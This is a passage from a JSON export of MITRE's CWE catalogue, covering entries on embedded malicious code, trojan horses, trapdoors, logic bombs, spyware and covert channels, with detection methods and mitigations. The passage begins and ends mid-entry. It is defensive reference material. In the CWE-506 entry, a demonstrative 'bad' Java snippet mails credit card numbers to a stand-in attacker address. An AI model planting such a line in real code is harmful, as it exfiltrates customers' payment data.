variable"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"586"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-461"}},{"attr":{"@_External_Reference_ID":"REF-462"}},{"attr":{"@_External_Reference_ID":"REF-463"}},{"attr":{"@_External_Reference_ID":"REF-464"}},{"attr":{"@_External_Reference_ID":"REF-465"}},{"attr":{"@_External_Reference_ID":"REF-466"}},{"attr":{"@_External_Reference_ID":"REF-467"}},{"attr":{"@_External_Reference_ID":"REF-468"}}]},"Notes":{"Note":{"#text":"The relationships between CWE-502 and CWE-915 need further exploration. CWE-915 is more narrowly scoped to object modification, and is not necessarily used for deserialization.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Modes_of_Introduction, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"506":{"attr":{"@_ID":"506","@_Name":"Embedded Malicious Code","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application contains code that appears to be malicious in nature.","Extended_Description":"Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of an application or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program\'s user in a way the user does not intend.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Bundling"},{"Phase":"Distribution"},{"Phase":"Installation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies","Generated Code Inspection"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Automated Monitored Execution"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Origin Analysis"}}]}},"Effectiveness":"SOAR Partial"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the example below, a malicous developer has injected code to send credit card numbers to the developer\'s own email address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"boolean authorizeCard(String ccn) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"mailCardNumber(ccn, \\"evil_developer@evil_domain.com\\");","xhtml:br":["","","","",""],"xhtml:i":["// Authorize credit card.","..."]}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Malicious"}},"Notes":{"Note":{"#text":"The term \\"Trojan horse\\" was introduced by Dan Edwards and recorded by James Anderson [18] to characterize a particular computer security threat; it has been redefined many times [4,18-20].","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Time_of_Introduction"}],"Previous_Entry_Name":{"#text":"Malicious","attr":{"@_Date":"2008-01-30"}}}},"507":{"attr":{"@_ID":"507","@_Name":"Trojan Horse","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software appears to contain benign or useful functionality, but it also contains code that is hidden from normal operation that violates the intended security policy of the user or the system administrator.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Most antivirus software scans for Trojan Horses."},{"Phase":"Installation","Description":"Verify the integrity of the software that is being installed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Trojan Horse"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 7, &#34;Viruses, Trojans, and Worms In a Nutshell&#34; Page 208"}}},"Notes":{"Note":[{"#text":"Potentially malicious dynamic code compiled at runtime can conceal any number of attacks that will not appear in the baseline. The use of dynamically compiled code could also allow the injection of attacks on post-deployed applications.","attr":{"@_Type":"Other"}},{"attr":{"@_Type":"Terminology"},"xhtml:p":["Definitions of \\"Trojan horse\\" and related terms have varied widely over the years, but common usage in 2008 generally refers to software that performs a legitimate function, but also contains malicious code.","Almost any malicious code can be called a Trojan horse, since the author of malicious code needs to disguise it somehow so that it will be invoked by a nonmalicious user (unless the author means also to invoke the code, in which case they presumably already possess the authorization to perform the intended sabotage). A Trojan horse that replicates itself by copying its code into other program files (see case MA1) is commonly referred to as a virus. One that replicates itself by creating new processes or files to contain its code, instead of modifying existing storage entities, is often called a worm. Denning provides a general discussion of these terms; differences of opinion about the term applicable to a particular flaw or its exploitations sometimes occur."]}]},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"508":{"attr":{"@_ID":"508","@_Name":"Non-Replicating Malicious Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Non-replicating malicious code only resides on the target system or software that is attacked; it does not attempt to spread to other systems.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"507","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Antivirus software can help mitigate known malicious code."},{"Phase":"Installation","Description":"Verify the integrity of the software that is being installed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Non-Replicating"}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Non-Replicating","attr":{"@_Date":"2008-01-30"}}}},"509":{"attr":{"@_ID":"509","@_Name":"Replicating Malicious Code (Virus or Worm)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Replicating malicious code, including viruses and worms, will attempt to attack other systems once it has successfully compromised the target system or software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"507","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Antivirus software scans for viruses or worms."},{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Replicating (virus)"}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Replicating (virus)","attr":{"@_Date":"2008-01-30"}},{"#text":"Replicating Malicious Code (virus)","attr":{"@_Date":"2008-04-11"}}]}},"510":{"attr":{"@_ID":"510","@_Name":"Trapdoor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A trapdoor is a hidden piece of code that responds to a special input, allowing its user access to resources without passing through the normal security enforcement mechanism.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inter-application Flow Analysis","Binary / Bytecode simple extractor - strings, ELF readers, etc."]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies","Generated Code Inspection"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Automated Monitored Execution","Forced Path Execution","Debugger","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."},{"Phase":"Testing","Description":"Identify and closely inspect the conditions for entering privileged areas of the code, especially those related to authentication, process invocation, and network communications."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Trapdoor"}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Detection_Factors, Relationships"}]}},"511":{"attr":{"@_ID":"511","@_Name":"Logic/Time Bomb","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains code that is designed to disrupt the legitimate operation of the software (or its environment) when a certain time passes, or when a certain logical condition is met.","Extended_Description":"When the time bomb or logic bomb is detonated, it may perform a denial of service such as crashing the system, deleting critical data, or degrading system response time. This bomb might be placed within either a replicating or non-replicating Trojan horse.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."},{"Phase":"Testing","Description":"Conduct a code coverage analysis using live testing, then closely inspect any code that is not covered."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Typical examples of triggers include system date or time mechanisms, random number generators, and counters that wait for an opportunity to launch their payload. When triggered, a time-bomb may deny service by crashing the system, deleting files, or degrading system response-time."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Logic/Time Bomb"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-172"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"512":{"attr":{"@_ID":"512","@_Name":"Spyware","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software collects personally identifiable information about a human user or the user\'s activities, but the software accesses this information using other resources besides itself, and it does not require that user\'s explicit approval or direct input into the software.","Extended_Description":"\\"Spyware\\" is a commonly used term with many definitions and interpretations. In general, it is meant to software that collects information or installs functionality that human users might not allow if they were fully aware of the actions being taken by the software. For example, a user might expect that tax software would collect a social security number and include it when filing a tax return, but that same user would not expect gaming software to obtain the social security number from that tax software\'s data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Use spyware detection and removal software."},{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"514":{"attr":{"@_ID":"514","@_Name":"Covert Channel","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A covert channel is a path that can be used to transfer information in a way not intended by the system\'s designers.","Extended_Description":"Typically the system has not given authorization for the transmission and has no knowledge of its occurrence.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1229","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"SOAR Partial"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Covert Channel"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"463"}}},"Notes":{"Note":{"#text":"A covert channel can be thought of as an emergent resource, meaning that it was not an originally intended resource, however it exists due the application\'s behaviors.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 